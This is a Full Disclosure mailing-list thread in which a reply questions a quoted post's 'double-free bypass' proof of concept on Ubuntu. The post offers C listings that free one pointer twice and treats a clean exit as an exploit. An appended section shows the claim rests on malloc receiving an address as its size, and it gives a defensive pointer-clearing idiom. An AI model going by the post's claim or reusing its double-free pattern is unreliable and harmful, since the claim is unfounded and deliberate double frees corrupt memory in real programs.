Maybe I’m misunderstanding something, but what is the vulnerability here? It looks like you are just demonstrating that a program can corrupt its own heap, which it can already do in numerous other ways.
> On 26 Mar 2018, at 00:26, keliikoa kirland <[email protected]> wrote:
>
> Tested on: Ubuntu 14.04.5 LTS
> Version: 4.04
>
> On 24 March 2018 at 18:11, keliikoa kirland <[email protected]> wrote:
>
>> Details from old email:
>> =========================================
>> "Double-Free bypass PoC is self-explanatory as well; 2 free's equate to a
>> double-free heap corruption segfault; using mmap() disables that segfault
>> and allows more than 1 free on any malloc'd/mmap'd variable. You can free
>> `x` 4+ times and it'll still exit cleanly. brk() has already been patched;
>> which is why i put // 1day next to it; same misalignment/technique to
>> mmap() which is still vuln/can be abused to write use-after-free's without
>> having the need to bypass heap corruption segfaults." brk() was equal to
>> mmap() in PoC below; mmap() --> brk() --> free() --> free() --> clean exit;
>> now just mmap() --> free() --> free()
>>
>> PoC:
>> =========================================
>> joe@ubuntu:~$ cat test1.c
>> #include <stdio.h>
>> #include <stdlib.h>
>> #include <string.h>
>> #include <sys/mman.h>
>>
>> int main(void){
>>     void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
>>
>>     void *z = malloc(p);
>>     free(z);
>>     free(z);
>> }
>>
>> joe@ubuntu:~$ ./test1
>> *** Error in `./test1': double free or corruption (top): 0x08332008 ***
>> Aborted (core dumped)
>>
>> joe@ubuntu:~$ cat test1.c
>> #include <stdio.h>
>> #include <stdlib.h>
>> #include <string.h>
>> #include <sys/mman.h>
>>
>> int main(void){
>>     void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
>>     p = mmap(0x2000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
>>
>>     void *z = malloc(p);
>>     free(z);
>>     free(z);
>> }
>>
>> joe@ubuntu:~$ ./test1
>> joe@ubuntu:~$
>>
>> References/Credits/Greetz:
>> =========================================
>> ac1db1tch3z koa
>> https://github.com/x0r1
>> http://steamcommunity.com/profiles/76561198333157214/
>>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
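An added example, not code from either post in this thread, that checks the point the reply raises: `malloc(p)` in the quoted PoC passes the mapping's address as the requested size, so what the two free() calls receive depends on whether that request was refused. The stand-in size (PTRDIFF_MAX + 1, chosen because glibc and musl reject any request above PTRDIFF_MAX), the helper names and the checked_free() idiom are constructed here and are not taken from the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* What the quoted PoC's malloc(p) actually asks for: a size equal to an
 * address. A constructed address-sized value just above PTRDIFF_MAX stands
 * in for the mmap() return; glibc refuses a request that large and returns
 * NULL (errno = ENOMEM), and free(NULL) is defined as a no-op, so two free()
 * calls on that result never touch the heap and are not a double free. */
static int pointer_sized_request_is_refused(void)
{
    size_t bogus_size = (size_t)PTRDIFF_MAX + 1; /* constructed stand-in */
    void *z = malloc(bogus_size);
    int refused = (z == NULL);
    free(z);   /* no-op on NULL */
    free(z);   /* still a no-op: nothing was ever allocated */
    return refused;
}

/* The double free the allocator aborts on is the first listing's case: one
 * live heap block released twice. The defensive idiom is to release through
 * a helper that clears the caller's pointer, so a repeated release sees NULL
 * instead of a dangling pointer. Returns 1 if a block was actually freed. */
static int checked_free(void **pp)
{
    if (pp == NULL || *pp == NULL)
        return 0;        /* nothing to release: a second call lands here */
    free(*pp);
    *pp = NULL;          /* no dangling pointer left for a later free or use */
    return 1;
}

static int double_release_through_checked_free(void)
{
    void *block = malloc(64);
    if (block == NULL)
        return -1;
    int released = checked_free(&block);  /* 1: real free, pointer cleared */
    released += checked_free(&block);     /* 0: sees NULL, no second free */
    return released;                      /* 1, and the heap stays intact */
}

int main(void)
{
    printf("address-sized request refused: %d\n", pointer_sized_request_is_refused());
    printf("blocks actually freed: %d\n", double_release_through_checked_free());
    return 0;
}
```

gcc -Wall also flags both conversions in the quoted PoC (integer passed as the mmap() address, pointer passed as the malloc() size), which is the first thing to check before reading a clean exit as a bypass.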
